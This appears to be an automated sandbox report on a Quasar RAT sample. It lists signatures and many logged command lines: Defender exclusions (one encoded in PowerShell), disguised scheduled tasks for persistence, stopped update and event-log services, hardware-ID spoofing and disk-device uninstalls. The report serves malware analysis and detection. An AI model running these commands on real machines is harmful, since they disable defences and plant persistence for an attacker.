Malware Analysis Report

2025-01-18 04:32

Sample ID 240105-nxpkdabhe6
Target 0c0dc0cf41e3c993ae5a22803275949abin.zip
SHA256 01e185ad6cba8440d1fa1d5c5ea5802d346ae7fabbe1c57115e4135b84420a7f
Tags
quasar office04 evasion persistence spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

01e185ad6cba8440d1fa1d5c5ea5802d346ae7fabbe1c57115e4135b84420a7f

Threat Level: Known bad

The file 0c0dc0cf41e3c993ae5a22803275949abin.zip was found to be: Known bad.

Malicious Activity Summary

quasar office04 evasion persistence spyware trojan

Quasar payload

Quasar RAT

Process spawned unexpected child process

Nirsoft

Creates new service(s)

Stops running service(s)

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-05 11:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-05 11:46

Reported

2024-01-05 11:49

Platform

win7-20231215-en

Max time kernel

0s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A

Creates new service(s)

persistence

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe

"C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: NZME-9H4D

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'" /f

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\s3KUFe101b.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\conhost.exe'

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Windows\TAPI\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\TAPI\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Windows\TAPI\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Google\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Google\conhost.exe'" /f

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: NZME-9H4D

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe

"C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe"

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728449HP-TRGT32560MST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328445HP-TRGT21812DQ

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628445HP-TRGT21812FU

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428445HP-TRGT21812FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528445HP-TRGT21812SL

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828445HP-TRGT21812SG

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228445HP-TRGT21812RV

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28445HP-TRGT21812AB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728465HP-TRGT20767MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628465HP-TRGT20767FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328465HP-TRGT20767DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528465HP-TRGT20767SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428465HP-TRGT20767FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828465HP-TRGT20767SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228465HP-TRGT20767RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\VC_redist.x64.exe

C:\ProgramData\VC_redist.x64.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "driverupdate"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328481HP-TRGT8973DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728481HP-TRGT8973MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628481HP-TRGT8973FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528481HP-TRGT8973SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428481HP-TRGT8973FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828481HP-TRGT8973SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228481HP-TRGT8973RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28481HP-TRGT8973AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "driverupdate"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28465HP-TRGT20767AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 9V2B-R0ZF

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 9V2B-R0ZF

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: TUI8-L1C8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: TUI8-L1C8

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: G82R-D9F0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: G82R-D9F0

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: PIP3-VJPS

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: PIP3-VJPS

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: F7M2-8LDT

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: F7M2-8LDT

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: Z4KU-N2GK

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: Z4KU-N2GK

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: SME3-DE0M

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: SME3-DE0M

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3V13-NN1U

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3V13-NN1U

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: GT39-ME29

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: GT39-ME29

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 9UN0-L18O

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 9UN0-L18O

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: F5MT-E1VR

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: F5MT-E1VR

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: M4I8-GMHJ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: M4I8-GMHJ

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4NL2-IHDE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4NL2-IHDE

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E7H3-L20O

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E7H3-L20O

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 5ODZ-8IZ1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 5ODZ-8IZ1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: B319-ZT36

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: B319-ZT36

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: E7F9-L7C9

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: E7F9-L7C9

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 45NC-UMFA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 45NC-UMFA

C:\Windows\System32\cmd.exe

